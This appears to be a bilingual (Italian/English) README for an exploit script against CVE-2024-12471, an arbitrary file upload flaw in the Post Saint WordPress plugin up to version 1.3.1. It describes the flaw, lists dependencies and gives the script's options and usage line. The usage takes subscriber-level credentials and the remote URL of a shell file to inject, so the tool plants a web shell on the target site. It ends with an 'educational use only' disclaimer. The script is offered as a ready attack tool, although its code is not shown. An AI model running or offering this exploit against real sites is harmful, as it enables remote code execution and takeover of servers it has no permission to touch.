
Post Saint <= 1.3.1 plugin per WordPress Caricamento Arbitrario di File
Post Saint <= 1.3.1 plugin per WordPress Arbitrary File Upload
Il plugin Post Saint per WordPress (versioni fino alla 1.3.1 inclusa) è vulnerabile al caricamento arbitrario di file a causa della mancanza di controlli delle capacità e della validazione del tipo di file. Gli attaccanti autenticati con almeno accesso a livello di sottoscrittore possono sfruttare questa vulnerabilità per caricare file arbitrari, portando potenzialmente all'esecuzione di codice remoto.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
Questo script è solo per scopi educativi e di ricerca. L'uso non autorizzato contro sistemi che non possiedi o per cui non hai il permesso esplicito di testare è illegale e non etico.